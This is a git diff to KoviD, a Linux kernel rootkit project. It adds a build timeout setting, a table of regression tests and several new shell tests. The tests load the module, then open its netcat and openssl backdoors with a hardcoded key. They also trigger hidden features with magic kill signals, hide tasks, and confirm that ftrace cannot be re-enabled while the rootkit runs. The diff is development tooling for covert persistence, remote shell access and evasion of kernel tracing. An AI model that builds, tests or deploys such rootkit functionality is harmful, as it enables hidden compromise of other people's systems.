diff --git a/Makefile b/Makefile index aa480d3..1bfdb45 100644 --- a/Makefile +++ b/Makefile @@ -16,15 +16,17 @@ UUIDGEN := $(shell uuidgen) ifndef TEST_ENV BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') +PRCTIMEOUT := 1200 else BDKEY=0x7d3b1cb572f16425 UNHIDEKEY=0x2 +PRCTIMEOUT := 120 endif # PROCNAME, /proc/ interface. COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \ - -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200 \ - -DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=1200 \ + -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK \ + -DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=$(PRCTIMEOUT) \ -DUUIDGEN=\"$(UUIDGEN)\" -DJOURNALCTL=\"$(JOURNALCTL)\" EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS} diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index 7aa48b8..2cbada8 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -296,18 +296,24 @@ Here are information about testing of the features available. NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should contain `# REQUIRES: DEPLOY_ONLY` marker. -| Feature | Tested | Regression Test | -| :--------------------------------------------------| :------------------------------| :------------------------------------ | -| No tainted messages/log appear in DEPLOY | Yes | cross/no-kovid-logs-in-deploy.test | -| kovid (DEPLOY) doesn't appear in /var /sys etc. | Yes | cross/no-kovid-found.test | -| Hide/Unhide Module Test in DEBUG Mode | Yes | cross/hide-unhide-module.test | -| Hide nc process | Yes | complex/nc-hide-pid{_host}.test | -| nc backdoor | Yes | native/nc-backdoor.test | -| openssl backdoor | Yes | native/openssl-backdoor.test | -| tty backdoor | Yes | native/tty-backdoor.test | -| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | -| Hide/Unhide Module | Yes | native/hide-unhide-module.test | -| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | -| hide file | Yes | native/hiden-file.test | -| hide file (2) | Yes | native/hiden-file-in-all-dirs.test | -| unhide module | Yes | native/hide-unhide-module.test | +| Feature | Tested | Regression Test | +| :--------------------------------------------------| :------------------------------| :------------------------------------------------------| +| No tainted messages/log appear in DEPLOY | Yes | cross/no-kovid-logs-in-deploy.test | +| kovid (DEPLOY) doesn't appear in /var /sys etc. | Yes | cross/no-kovid-found.test | +| Hide/Unhide Module Test in DEBUG Mode | Yes | cross/hide-unhide-module.test | +| Hide nc process | Yes | complex/nc-hide-pid{_host}.test | +| nc backdoor | Yes | native/nc-backdoor.test | +| openssl backdoor | Yes | native/openssl-backdoor.test | +| tty backdoor | Yes | native/tty-backdoor.test | +| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | +| Hide/Unhide Module | Yes | native/hide-unhide-module.test | +| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | +| hide file | Yes | native/hiden-file.test | +| hide file (2) | Yes | native/hiden-file-in-all-dirs.test | +| unhide module | Yes | native/hide-unhide-module.test | +| procfile timeout | Yes | native/proc-timeout.test | +| Ftrace | Yes | native/ftrace-disable-enable.test | +| Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test | +| bdclient.sh test | Yes | native/nc-backdoor-bdclient.test | +| bdclient.sh GIFT | Yes | test/native/gift-bdclient.test | +| Kaudit | Yes | test/native/kaudit.test | diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test new file mode 100644 index 0000000..dd4d9bf --- /dev/null +++ b/test/native/ftrace-disable-enable.test @@ -0,0 +1,66 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 +sudo insmod ../../../build/kovid.ko + +# Check initial value of ftrace_enabled +INITIAL_VALUE=$(cat /proc/sys/kernel/ftrace_enabled) +echo "Initial value of ftrace_enabled: $INITIAL_VALUE" + +# Attempt to disable ftrace by writing 0 to ftrace_enabled +echo 0 > /proc/sys/kernel/ftrace_enabled +READ_VALUE=$(cat /proc/sys/kernel/ftrace_enabled) +echo "Value of ftrace_enabled after writing 0: $READ_VALUE" + +# Verify kovid functionality using list-hidden-tasks +sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425 +echo list-hidden-tasks > /proc/myprocname +echo "Kovid functionality with ftrace_enabled=0 is working." + +# Attempt another ftrace write with a different value (e.g., 2) +echo 2 > /proc/sys/kernel/ftrace_enabled +READ_VALUE2=$(cat /proc/sys/kernel/ftrace_enabled) +echo "Value of ftrace_enabled after writing 2: $READ_VALUE2" + + +# Verify kovid functionality again using list-hidden-tasks +echo list-hidden-tasks > /proc/myprocname +echo "Kovid functionality with ftrace_enabled=2 is working." + +# Test echo with invalid values +echo -1 > /proc/sys/kernel/ftrace_enabled +READ_INVALID=$(cat /proc/sys/kernel/ftrace_enabled) +echo "Value of ftrace_enabled after writing -1: $READ_INVALID" + +# Cleanup +sudo rmmod kovid +sudo dmesg + +# CHECK: Initial value of ftrace_enabled: 1 +# CHECK: Value of ftrace_enabled after writing 0: 1 +# CHECK: Kovid functionality with ftrace_enabled=0 is working. +# CHECK: Value of ftrace_enabled after writing 2: 1 +# CHECK: Kovid functionality with ftrace_enabled=2 is working. +# CHECK: Value of ftrace_enabled after writing -1: 1 + +# CHECK: kv: using kprobe for kallsyms_lookup_name +# CHECK: Waiting for event +# CHECK: loaded +# CHECK: Got event +# CHECK: hide: {{.*}} +# CHECK: hide: {{.*}} +# CHECK: Got event +# CHECK: unloaded + +# FIXME: It should print +# Value of ftrace_enabled after writing 2: 1 +# Value of ftrace_enabled after writing 0: 0 +# etc. +# I have tried manually, as root, and it works. +# I am not sure why `sudo su` did not make difference here. diff --git a/test/native/gift-bdclient.test b/test/native/gift-bdclient.test new file mode 100644 index 0000000..e9bbb0a --- /dev/null +++ b/test/native/gift-bdclient.test @@ -0,0 +1,47 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 + +# Insert the kovid kernel module +sudo insmod ../../../build/kovid.ko + +# Test parameters +REMOTE_IP="127.0.0.1" # Use localhost for the remote IP +REMOTE_PORT="9999" +BACKDOOR_KEY="0x7d3b1cb572f16425" +GIFT_IP="127.0.0.1" # Use localhost for GIFT + +# Test connection without GIFT +echo "Testing connection without GIFT..." +if GIFT="" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then + echo "Connection without GIFT succeeded." +else + echo "ERROR: Connection without GIFT failed." +fi + +# Test connection with GIFT +echo "Testing connection with GIFT..." +if GIFT="$GIFT_IP" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then + echo "Connection with GIFT succeeded." +else + echo "ERROR: Connection with GIFT failed." +fi + +# Cleanup +sudo rmmod kovid +sudo dmesg + +# CHECK: Connection without GIFT succeeded. +# CHECK: Connection with GIFT succeeded. + +# CHECK: kv: using kprobe for kallsyms_lookup_name +# CHECK: Waiting for event +# CHECK: loaded +# CHECK: Got event +# CHECK: unloaded diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test index 13ceff5..96db504 100644 --- a/test/native/hide-unhide-module.test +++ b/test/native/hide-unhide-module.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS diff --git a/test/native/kaudit.test b/test/native/kaudit.test new file mode 100644 index 0000000..9e2e37d --- /dev/null +++ b/test/native/kaudit.test @@ -0,0 +1,19 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 +sudo insmod ../../../build/kovid.ko +kill -CONT 999 +su +exit +sudo rmmod kovid +sudo dmesg + +# CHECK: loaded. +# CHECK: Cool! Now try 'su' +# CHECK: Uninstalling: 'sys_exit_group' syscall=1 +# CHECK: unloaded. diff --git a/test/native/nc-backdoor-bdclient.test b/test/native/nc-backdoor-bdclient.test new file mode 100644 index 0000000..f6ce207 --- /dev/null +++ b/test/native/nc-backdoor-bdclient.test @@ -0,0 +1,48 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s &> %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 + +# Insert the kovid kernel module +sudo insmod ../../../build/kovid.ko + +# Define the number of connection attempts +NUM_ATTEMPTS=5 +SUCCESS_COUNT=0 +FAIL_COUNT=0 + +# Automate bdclient.sh for repeated connection and disconnection +for i in $(seq 1 $NUM_ATTEMPTS); do + echo "Attempt $i: Establishing connection..." + if sudo timeout 5 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then + echo "Connection attempt $i succeeded." + SUCCESS_COUNT=$((SUCCESS_COUNT + 1)) + else + echo "Connection attempt $i failed." + FAIL_COUNT=$((FAIL_COUNT + 1)) + fi + # Wait briefly between attempts + sleep 1 +done + +# Remove the kernel module and cleanup +sudo rmmod kovid +sudo dmesg + +# CHECK: Connection received on +# CHECK: Connection received on +# CHECK: Connection received on +# CHECK: Connection received on +# CHECK: Connection received on + +# CHECK: kv: using kprobe for kallsyms_lookup_name +# CHECK: Waiting for event +# CHECK: loaded +# CHECK: Got event +# CHECK: Got event +# CHECK: unloaded diff --git a/test/native/nc-backdoor-remove-and-install-nc-tool.test b/test/native/nc-backdoor-remove-and-install-nc-tool.test new file mode 100644 index 0000000..4c02b80 --- /dev/null +++ b/test/native/nc-backdoor-remove-and-install-nc-tool.test @@ -0,0 +1,50 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 + +# Prepare system by removing netcat (simulating backdoor tool removal) +echo "Removing netcat..." +sudo mv /usr/bin/nc /usr/bin/nc2 || echo "Netcat already removed." + +# Insert the kovid kernel module +sudo insmod ../../../build/kovid.ko + +# Attempt to establish a connection without netcat +echo "Testing connection without netcat..." +if ! sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then + echo "Connection failed as expected without netcat." +else + echo "ERROR: Connection unexpectedly succeeded without netcat." +fi + +# Restore netcat (simulating backdoor tool installation) +echo "Restoring netcat..." +sudo mv /usr/bin/nc2 /usr/bin/nc || echo "Netcat already restored." + +# Attempt to establish a connection with netcat restored +echo "Testing connection with netcat restored..." +if sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then + echo "Connection succeeded as expected with netcat restored." +else + echo "ERROR: Connection unexpectedly failed with netcat restored." +fi + +# Remove the kernel module and cleanup +sudo rmmod kovid +sudo dmesg + +# CHECK: Connection failed as expected without netcat. +# CHECK: /bin/sh: 0: can't access tty; job control turned off + +# CHECK: kv: using kprobe for kallsyms_lookup_name +# CHECK: Waiting for event +# CHECK: loaded +# CHECK: Got event +# CHECK: Got event +# CHECK: unloaded diff --git a/test/native/proc-timeout.test b/test/native/proc-timeout.test new file mode 100644 index 0000000..a1f80fc --- /dev/null +++ b/test/native/proc-timeout.test @@ -0,0 +1,16 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sleep 10 +sudo insmod ../../../build/kovid.ko +kill -CONT 31337 +sleep 140 +sudo dmesg +sudo rmmod kovid + +# CHECK: /proc/myprocname loaded, timeout: 120s +# CHECK: /proc/myprocname unloaded.